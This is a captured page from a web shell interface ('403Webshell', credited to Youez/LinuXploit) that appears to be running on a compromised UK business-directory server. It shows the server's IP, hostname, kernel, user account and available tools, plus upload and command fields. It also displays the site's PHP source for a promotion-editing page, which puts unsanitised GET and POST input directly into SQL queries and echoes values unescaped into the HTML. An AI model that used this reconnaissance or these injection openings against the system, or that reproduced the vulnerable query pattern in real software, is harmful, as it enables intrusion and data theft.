403Webshell
Server IP : 51.89.169.208  /  Your IP : 216.73.216.57
Web Server : Apache
System : Linux ns3209505.ip-198-244-202.eu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Tue Nov 5 04:50:16 EST 2024 x86_64
User : yellowleaf ( 1019)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/yellowleaf/public_html/members/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/yellowleaf/public_html/members//NEW_promo_edit.php
<?
$path  = $_SERVER['DOCUMENT_ROOT'];
include_once $path . '/connect_db.php';
include 'accesscontrol.php';
$adid = $_GET['adid'];
$pid = $_GET['pid'];
// check if advert beleongs to members
if (advert_check($adid, $memberid) === false) {
	header('Location: index.php');
	exit();
}
// css for menu
$styleManage = 'color:#ff6131;background-color:#fff;border-top:1px solid #c9c9c9;font-weight:bold;';
if (isset($_POST['submit'])) {

	$prom_title = $_POST['prom_title'];
	$prom_desc = $_POST['prom_desc'];
	$prom_date = time();
	$expiry_day = $_POST['expiry_day'];
	$expiry_month = $_POST['expiry_month'];
	$expiry_year = $_POST['expiry_year'];
	$valid_day = $_POST['valid_day'];
	$valid_month = $_POST['valid_month'];
	$valid_year = $_POST['valid_year'];

	// converting valid
	$val = $valid_month . '/' . $valid_day . '/' . $valid_year;
	$prom_valid = strtotime($val);

	// converting expiry
	$expiry_dmy = $expiry_month . '/' . $expiry_day . '/' . $expiry_year;
	$prom_expiry = strtotime($expiry_dmy);

	$q3 = "UPDATE promotions SET
	       prom_title = '$prom_title',
	       prom_desc = '$prom_desc',
	       prom_date = '$prom_date',
	       prom_valid = '$prom_valid',
	       prom_expiry = '$prom_expiry' WHERE prom_id='{$pid}' AND member_id={$memberid}";

	$r3 = $connect->query($q3) or die($connect->error);

	$r4 = $connect->query("UPDATE ads SET promo_date='$prom_expiry' WHERE adid ='{$adid}' AND memberid={$memberid}") or die($connect->error);

	$success = TRUE;
}
?>
<!DOCTYPE html>
<html>

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
	<title>YellowLeaf UK</title>
	<link href='https://unpkg.com/boxicons@2.0.9/css/boxicons.min.css' rel='stylesheet'>
	<link rel="stylesheet" href="/header-footer/global.css">
	<link rel="stylesheet" href="index.css">
	<style>
		.form-group {
			display: block;
		}
		.form-group input {
			border-radius: 4px;
			padding: 0 16px;
		}
		.form-group textarea {
			border-radius: 4px;
			padding: 12px 16px;
		}
	</style>
</head>

<body>

	<? include 'member_menu.php'; ?>

	<!-- NAVBAR -->
	<section id="content">
		<!-- NAVBAR -->
		<nav>
			<i class='bx bx-menu toggle-sidebar'></i>
			<a href="/members/logout.html" class="logout">
				<i class='bx bx-log-out'></i>
				Logout
			</a>
		</nav>
		<!-- NAVBAR -->

		<!-- MAIN -->
		<main>
			<div class="container">
				<h1 class="title">Update Promotion or Deal</h1>
				<p><?= $ad_row['companyname'] ?></p>
				<!-- <ul class="breadcrumbs">
			<li><a href="#">Home</a></li>
			<li class="divider">/</li>
			<li><a href="#" class="active">Dashboard</a></li>
			</ul> -->
				<div class="main-content">
					<div class="main-box">
						<?
						// for opening times
						$add_que = $connect->query("SELECT * FROM promotions WHERE ad_id ='{$adid}' AND prom_id='{$pid}' ORDER BY prom_id DESC");
						$promo_numRow = $add_que->num_rows;

						// business details
						$ad_sql = $connect->query("SELECT * FROM ads WHERE memberid ='{$memberid}' AND adid='{$adid}'");
						$ad_row = $ad_sql->fetch_array();

						if ($promo_numRow > 0) {
							$add_que_sql = $add_que->fetch_array();
							$month_array = array("January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December");
							$valid_day = date('j', $add_que_sql['prom_valid']);
							$valid_month = date('n', $add_que_sql['prom_valid']);
							$valid_year = date('Y', $add_que_sql['prom_valid']);
							$expiry_day = date('j', $add_que_sql['prom_expiry']);
							$expiry_month = date('n', $add_que_sql['prom_expiry']);
							$expiry_year = date('Y', $add_que_sql['prom_expiry']);

						?>
						<form name="RegForm" action="promo_edit.php?adid=<?= $adid ?>&pid=<?= $pid ?>" method="POST" onsubmit="return CheckRegister();" autocomplete="off">
							<? if ($success == TRUE) { ?>
								<div class="alert alert-success">
									Update Successful. Your details have been saved. <br><a href="promo.html?adid=<?= $adid ?>">Click here to go back to Manage Promotions ></a>
								</div>
							<? } ?>
							<div class="form-box">
								<div class="form-description">Please enter the title of your business promotion.</div>
								<div class="form-group">
									<input name="prom_title" type="text" class="txbox" size="40" value="<?= $add_que_sql['prom_title'] ?>">
								</div>
							</div>
							<div class="form-box">
								<div class="form-description">Please enter the description of your promotion.</div>
								<div class="form-group">
									<textarea name="prom_desc" rows="6"><?= $add_que_sql['prom_desc'] ?></textarea>
								</div>
							</div>
							<div class="form-box">
								<div class="form-description">Please enter the date that your promotion is valid from.</div>
								<div class="form-group">
									<div class="form-box">
										<select name="valid_day">
											<?
											for ($d = 1; $d <= 31; $d++) {
												if ($valid_day == $d) {
													echo '<option value="' . $d . '" selected>' . $d . '</option>';
												} else {
													echo '<option value="' . $d . '">' . $d . '</option>';
												}
											}
											?>
										</select>
									</div>
									<div class="form-box">
										<select name="valid_month">
											<?
											$v_m_num = 1;
											foreach ($month_array as $v_month) {
												if ($v_m_num == $valid_month) {
													echo '<option value="' . $v_m_num . '" selected>' . $v_month . '</option>';
												} else {
													echo '<option value="' . $v_m_num . '">' . $v_month . '</option>';
												}
												$v_m_num++;
											}
											?>
										</select>
									</div>
									<div class="form-box">
										<select name="valid_year">
											<?
											$y = date('Y');
											for ($i = 1; $i <= 50; $i++) {
												if ($y == $valid_year) {
													echo '<option value="' . $y . '" selected>' . $y . '</option>';
												} else {
													echo '<option value="' . $y . '">' . $y . '</option>';
												}
												$y++;
											}
											?>
										</select>
									</div>
								</div>
							</div>
							<div class="form-box">
								<div class="form-description">Please enter the expiry date of your promotion.</div>
								<div class="form-group">
									<div class="form-box">
									<select name="expiry_day">
										<?
										for ($d2 = 1; $d2 <= 31; $d2++) {
											if ($expiry_day == $d2) {
												echo '<option value="' . $d2 . '" selected>' . $d2 . '</option>';
											} else {
												echo '<option value="' . $d2 . '">' . $d2 . '</option>';
											}
										}
										?>
									</select>
									</div>
									<div class="form-box">
										<select name="expiry_month">
											<?
											$e_m_num = 1;
											foreach ($month_array as $e_month) {
												if ($e_m_num == $expiry_month) {
													echo '<option value="' . $e_m_num . '" selected>' . $e_month . '</option>';
												} else {
													echo '<option value="' . $e_m_num . '">' . $e_month . '</option>';
												}
												$e_m_num++;
											}
											?>
										</select>
									</div>
									<div class="form-box">
										<select name="expiry_year">
											<?
											$yr = date('Y');
											for ($z = 1; $z <= 50; $z++) {
												if ($yr == $expiry_year) {
													echo '<option value="' . $yr . '" selected>' . $yr . '</option>';
												} else {
													echo '<option value="' . $yr . '">' . $yr . '</option>';
												}
												$yr++;
											}
											?>
										</select>
									</div>
								</div>
							</div>
							<button type="submit" name="submit" class="button button-yellow">Update Promotion</button>
							<a href="promo.php?adid=<?= $adid ?>" class="button button-outline-yellow">Cancel</a>
						</form>
						<? } ?>
					</div>
				</div>
			</div>
		</main>
		<!-- MAIN -->
	</section>
	<!-- NAVBAR -->

	<script>
		function CheckRegister() {
			if (document.RegForm.prom_title.value == "") {
				window.alert('Please enter the title of your business promotion.');
				document.RegForm.prom_title.focus();
				return false;
			}
			if (document.RegForm.prom_desc.value == "") {
				window.alert('Please enter the description of your promotion.');
				document.RegForm.prom_desc.focus();
				return false;
			}
			if (document.RegForm.valid_day.value == "") {
				window.alert('Please select the \'Day\' for the \'Valid From\' date.');
				document.RegForm.valid_day.focus();
				return false;
			}
			if (document.RegForm.valid_month.value == "") {
				window.alert('Please select the \'Month\' for the \'Valid From\' date.');
				document.RegForm.valid_month.focus();
				return false;
			}
			if (document.RegForm.valid_year.value == "") {
				window.alert('Please select the \'Year\' for the \'Valid From\' date.');
				document.RegForm.valid_year.focus();
				return false;
			}
			if (document.RegForm.expiry_day.value == "") {
				window.alert('Please select the\'Day\' for the \'Expiry\' date.');
				document.RegForm.expiry_day.focus();
				return false;
			}
			if (document.RegForm.expiry_month.value == "") {
				window.alert('Please select the \'Month\' for the \'Expiry\' date.');
				document.RegForm.expiry_month.focus();
				return false;
			}
			if (document.RegForm.expiry_year.value == "") {
				window.alert('Please select the\'Year\' for the \'Expiry\' date.');
				document.RegForm.expiry_year.focus();
				return false;
			}
		}
	</script>
	<script src="script.js"></script>
</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit